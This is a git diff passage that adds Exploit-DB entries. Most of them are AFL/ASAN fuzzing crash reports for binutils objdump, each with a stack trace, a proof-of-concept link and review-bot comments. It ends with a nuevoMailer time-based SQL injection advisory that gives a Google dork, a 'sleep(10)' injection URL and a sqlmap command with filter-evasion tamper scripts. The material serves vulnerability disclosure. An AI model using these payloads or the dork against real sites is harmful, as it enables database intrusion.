+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2445)
+ in dump_bfd at binutils/objdump.c:3547
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3547)
+ in display_file at binutils/objdump.c:3714
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3714)
+ in main at binutils/objdump.c:4016
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L4016)
+
+
+Additional Information:
+The command used was `objdump -D `. The compilation flags used were `-g -O2 -fno-omit-frame-pointer -fsanitize=address -fno-sanitize-recover=undefined`. The configuration settings used were `--enable-targets=all --disable-shared`.
+
+
+Proofs of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42199.zip
diff --git a/platforms/linux/dos/42200.txt b/platforms/linux/dos/42200.txt
new file mode 100755
index 000000000..a740882d1
--- /dev/null
+++ b/platforms/linux/dos/42200.txt
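Review bot: Three separate inputs fault in `disassemble_bytes` at three different lines of `binutils/objdump.c` (1993, 1932 and 1926), all `heap-buffer-overflow`, and the report says neither whether they share a root cause nor which target each input is for — every frame shown is generic objdump code, so the actual trigger is in a per-target disassembler the report never names. One sentence per input along the lines of `Input 37a2b137…: <arch/BFD target>, disassembled via <print_insn_*>` would let a maintainer or a defender tell one bug from three, and an `Affected:` line should record the `--enable-targets=all` build, since a host-only objdump may not even recognise these inputs. As with the sibling reports, ASAN's heap-buffer-overflow does not by itself establish a write, so the impact should be stated as an out-of-bounds access / crash unless the attached logs show more.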
@@ -0,0 +1,41 @@
+Source: https://sourceware.org/bugzilla/show_bug.cgi?id=21581
+
+I have been fuzzing objdump with American Fuzzy Lop and AddressSanitizer.
+
+Please find attached the minimized file causing the issue ("Input") and the
+ASAN report log ("Output"). Below is the reduced stacktrace with links to the
+corresponding source lines on a GitHub mirror.
+
+The command I used was `objdump -D `.
+
+Let me know if there is any additional information I can provide.
+
+--
+
+Input: 02d8fa874391d563ccfd5911ff5f5cf8.fe651c9b03ff955c157ecee745208476.min
+Output: 02d8fa874391d563ccfd5911ff5f5cf8.fe651c9b03ff955c157ecee745208476.txt
+
+Error in "bfd_get_string": stack-buffer-overflow
+ in bfd_get_string at bfd/ieee.c:198
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/ieee.c#L198)
+ in read_id at bfd/ieee.c:227
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/ieee.c#L227)
+ in ieee_object_p at bfd/ieee.c:1907
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/ieee.c#L1907)
+ in bfd_check_format_matches at bfd/format.c:311
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/format.c#L311)
+ in display_object_bfd at binutils/objdump.c:3602
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3602)
+ in display_any_bfd at binutils/objdump.c:3693
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3693)
+ in display_file at binutils/objdump.c:3714
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3714)
+ in main at binutils/objdump.c:4016
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L4016)
+
+Additional Information:
+The command used was `objdump -D `. The compilation flags used were `-g -O2 -fno-omit-frame-pointer -fsanitize=address -fno-sanitize-recover=undefined`. The configuration settings used were `--enable-targets=all --disable-shared`.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42200.zip
diff --git a/platforms/linux/dos/42201.txt b/platforms/linux/dos/42201.txt
new file mode 100755
index 000000000..afca80a44
--- /dev/null
+++ b/platforms/linux/dos/42201.txt
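Review bot: Unlike the disassembler reports, this `stack-buffer-overflow` is hit inside `bfd_check_format_matches` → `ieee_object_p` → `read_id` → `bfd_get_string`, i.e. during libbfd's format probing before objdump has selected any target, so the `-D` flag is incidental: any libbfd consumer that opens an attacker-supplied file and probes its format (nm, strings, ld and gdb are the usual suspects) would presumably reach the same code if the IEEE-695 backend is compiled in, and the report should say so rather than leave readers assuming it is objdump-only. A line such as `Reachable from: bfd_check_format() on any untrusted input when the IEEE-695 backend is built; objdump -D is only the harness used here` would capture that. As elsewhere, `--enable-targets=all` is part of the reproduction environment and belongs in an `Affected:` line, and the `objdump -D ` command is missing its file placeholder.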
@@ -0,0 +1,70 @@
+Source: https://sourceware.org/bugzilla/show_bug.cgi?id=21586
+
+I have been fuzzing objdump with American Fuzzy Lop and AddressSanitizer.
+
+Please find attached the minimized file causing the issue ("Input") and the
+ASAN report log ("Output"). Below is the reduced stacktrace with links to the
+corresponding source lines on a GitHub mirror.
+
+The command I used was `objdump -D `.
+
+Let me know if there is any additional information I can provide.
+
+--
+
+Input: 5ddfa2412fa85ccaec333ef01e682e5c.1a654bffa0e51502d471945837d8c8d2.min
+Output: 5ddfa2412fa85ccaec333ef01e682e5c.1a654bffa0e51502d471945837d8c8d2.txt
+
+Error in "decode_pseudodbg_assert_0": global-buffer-overflow
+ in decode_pseudodbg_assert_0 at opcodes/bfin-dis.c:4604
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/bfin-dis.c#L4604)
+ in _print_insn_bfin at opcodes/bfin-dis.c:4760
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/bfin-dis.c#L4760)
+ in print_insn_bfin at opcodes/bfin-dis.c:4778
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/bfin-dis.c#L4778)
+ in disassemble_bytes at binutils/objdump.c:1864
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L1864)
+ in disassemble_section at binutils/objdump.c:2309
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2309)
+ in bfd_map_over_sections at bfd/section.c:1395
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/section.c#L1395)
+ in disassemble_data at binutils/objdump.c:2445
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2445)
+ in dump_bfd at binutils/objdump.c:3547
+ (see 
https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3547)
+ in display_file at binutils/objdump.c:3714
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3714)
+ in main at binutils/objdump.c:4016
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L4016)
+
+Input: eaa0ea31671f33585380fa20a9e48279.3eb5986fdbd0116801326df1767e6ef0.min
+Output: eaa0ea31671f33585380fa20a9e48279.3eb5986fdbd0116801326df1767e6ef0.txt
+
+Error in "decode_pseudodbg_assert_0": global-buffer-overflow
+ in decode_pseudodbg_assert_0 at opcodes/bfin-dis.c:4596
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/bfin-dis.c#L4596)
+ in _print_insn_bfin at opcodes/bfin-dis.c:4760
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/bfin-dis.c#L4760)
+ in print_insn_bfin at opcodes/bfin-dis.c:4778
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/bfin-dis.c#L4778)
+ in disassemble_bytes at binutils/objdump.c:1864
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L1864)
+ in disassemble_section at binutils/objdump.c:2309
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2309)
+ in bfd_map_over_sections at bfd/section.c:1395
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/section.c#L1395)
+ in disassemble_data at binutils/objdump.c:2445
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2445)
+ in dump_bfd at binutils/objdump.c:3547
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3547)
+ in 
display_file at binutils/objdump.c:3714
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3714)
+ in main at binutils/objdump.c:4016
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L4016)
+
+Additional Information:
+The command used was `objdump -D `. The compilation flags used were `-g -O2 -fno-omit-frame-pointer -fsanitize=address -fno-sanitize-recover=undefined`. The configuration settings used were `--enable-targets=all --disable-shared`.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42201.zip
diff --git a/platforms/linux/dos/42202.txt b/platforms/linux/dos/42202.txt
new file mode 100755
index 000000000..2c5429076
--- /dev/null
+++ b/platforms/linux/dos/42202.txt
@@ -0,0 +1,37 @@
+Source: https://sourceware.org/bugzilla/show_bug.cgi?id=21582
+
+I have been fuzzing objdump with American Fuzzy Lop and AddressSanitizer.
+
+Please find attached the minimized file causing the issue ("Input") and the
+ASAN report log ("Output"). Below is the reduced stacktrace with links to the
+corresponding source lines on a GitHub mirror.
+
+The command I used was `objdump -D `.
+
+Let me know if there is any additional information I can provide.
+
+--
+
+Input: ef51bcdcaae667058b002f94b5dafd05.12926af7cc4fab77f87a3ec70a329100.min
+Output: ef51bcdcaae667058b002f94b5dafd05.12926af7cc4fab77f87a3ec70a329100.txt
+
+Error in "ieee_object_p": stack-buffer-overflow
+ in ieee_object_p at bfd/ieee.c:1985
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/ieee.c#L1985)
+ in bfd_check_format_matches at bfd/format.c:311
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/format.c#L311)
+ in display_object_bfd at binutils/objdump.c:3602
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3602)
+ in display_any_bfd at binutils/objdump.c:3693
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3693)
+ in display_file at binutils/objdump.c:3714
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3714)
+ in main at binutils/objdump.c:4016
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L4016)
+
+Additional Information:
+The command used was `objdump -D `. The compilation flags used were `-g -O2 -fno-omit-frame-pointer -fsanitize=address -fno-sanitize-recover=undefined`. The configuration settings used were `--enable-targets=all --disable-shared`.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42202.zip
diff --git a/platforms/linux/dos/42203.txt b/platforms/linux/dos/42203.txt
new file mode 100755
index 000000000..be94b16c8
--- /dev/null
+++ b/platforms/linux/dos/42203.txt
@@ -0,0 +1,43 @@
+Source: https://sourceware.org/bugzilla/show_bug.cgi?id=21576
+
+I have been fuzzing objdump with American Fuzzy Lop and AddressSanitizer.
+
+Please find attached the minimized file causing the issue ("Input") and the
+ASAN report log ("Output"). Below is the reduced stacktrace with links to the
+corresponding source lines on a GitHub mirror.
+
+The command I used was `objdump -D `.
+
+Let me know if there is any additional information I can provide.
+
+--
+
+Input: 2a13a720199253614962e0bb4402d98c.9149a6478708ae7cb458345e7cbc9354.min
+Output: 2a13a720199253614962e0bb4402d98c.9149a6478708ae7cb458345e7cbc9354.txt
+
+Error in "print_insn_score16": global-buffer-overflow
+ in print_insn_score16 at opcodes/score7-dis.c:723
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/score7-dis.c#L723)
+ in s7_print_insn at opcodes/score7-dis.c:954
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/score7-dis.c#L954)
+ in disassemble_bytes at binutils/objdump.c:1864
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L1864)
+ in disassemble_section at binutils/objdump.c:2309
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2309)
+ in bfd_map_over_sections at bfd/section.c:1395
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/section.c#L1395)
+ in disassemble_data at binutils/objdump.c:2445
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2445)
+ in dump_bfd at binutils/objdump.c:3547
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3547)
+ in display_file at binutils/objdump.c:3714
+ (see 
https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3714)
+ in main at binutils/objdump.c:4016
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L4016)
+
+Additional Information:
+The command used was `objdump -D `. The compilation flags used were `-g -O2 -fno-omit-frame-pointer -fsanitize=address -fno-sanitize-recover=undefined`. The configuration settings used were `--enable-targets=all --disable-shared`.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42203.zip
diff --git a/platforms/linux/dos/42204.txt b/platforms/linux/dos/42204.txt
new file mode 100755
index 000000000..cac284edb
--- /dev/null
+++ b/platforms/linux/dos/42204.txt
@@ -0,0 +1,44 @@
+Source: https://sourceware.org/bugzilla/show_bug.cgi?id=21595
+
+I have been fuzzing objdump with American Fuzzy Lop and AddressSanitizer.
+
+Please find attached the minimized file causing the issue ("Input") and the ASAN report log ("Output"). Below is the reduced stacktrace with links to the corresponding source lines on a GitHub mirror.
+
+The command used was `objdump -D `. The compilation flags used were `-g -O2 -fno-omit-frame-pointer -fsanitize=address -fno-sanitize-recover=undefined`. The configuration settings used were `--enable-targets=all --disable-shared`.
+
+Let me know if there is any additional information I can provide.
+
+--
+
+Input: 3ade4a4333249762a9df82c47f3c111a.65dbcbffa0f6467be847e1372688623b.min
+Output: 3ade4a4333249762a9df82c47f3c111a.65dbcbffa0f6467be847e1372688623b.txt
+
+Error in "aarch64_ext_ldst_reglist": global-buffer-overflow
+ in aarch64_ext_ldst_reglist at opcodes/aarch64-dis.c:412
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/aarch64-dis.c#L412)
+ in aarch64_opcode_decode at opcodes/aarch64-dis.c:2739
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/aarch64-dis.c#L2739)
+ in aarch64_decode_insn at opcodes/aarch64-dis.c:2831
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/aarch64-dis.c#L2831)
+ in print_insn_aarch64_word at opcodes/aarch64-dis.c:2973
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/aarch64-dis.c#L2973)
+ in print_insn_aarch64 at opcodes/aarch64-dis.c:3209
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/aarch64-dis.c#L3209)
+ in disassemble_bytes at binutils/objdump.c:1864
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L1864)
+ in disassemble_section at binutils/objdump.c:2309
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2309)
+ in bfd_map_over_sections at bfd/section.c:1395
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/section.c#L1395)
+ in disassemble_data at binutils/objdump.c:2445
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2445)
+ in dump_bfd at binutils/objdump.c:3547
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3547)
+ in display_file at binutils/objdump.c:3714
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3714)
+ in main at binutils/objdump.c:4016
+ (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L4016)
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42204.zip
diff --git a/platforms/php/webapps/42193.txt b/platforms/php/webapps/42193.txt
new file mode 100755
index 000000000..d62b9d915
--- /dev/null
+++ b/platforms/php/webapps/42193.txt
@@ -0,0 +1,27 @@
+# Exploit Title: nuevoMailer version 6.0 and earlier time-based SQL Injection
+# Exploit Author: ALEH BOITSAU
+# Google Dork: inurl:/inc/rdr.php?
+# Date: 2017-06-09
+# Vendor Homepage: https://www.nuevomailer.com/
+# Version: 6.0 and earlier
+# Tested on: Linux
+# CVE: CVE-2017-9730
+
+Description: SQL injection vulnerability in rdr.php in nuevoMailer version 6.0 and earlier
+allows remote attackers to execute arbitrary SQL commands via the "r" parameter.
+
+PoC:
+
+https://vulnerable_site.com/inc/rdr.php?r=69387c602c1056c556[time based SQL INJ]
+
+https://vulnerable_site.com/inc/rdr.php?r=69387c602c1056c556%20and%20sleep(10)--+
+
+sqlmap -u "http://vulnerable_site.com/inc/rdr.php?r=120c44c5" --dbms=mysql -p r --tamper=equaltolike,between  --hostname --technique=T -v 3 --random-agent --time-sec=4
+
+NB: "equaltolike" and "between" arsenal to defeat filtering! Data retrieval process may take more than usual time.
+
+Disclosure Timeline:
+2017-06-09: Vendor has been notified
+2017-06-09: Vendor responded with intention to fix the vulnerability
+2017-06-16: CVE number acquired
+2017-06-16: Public disclosure
\ No newline at end of file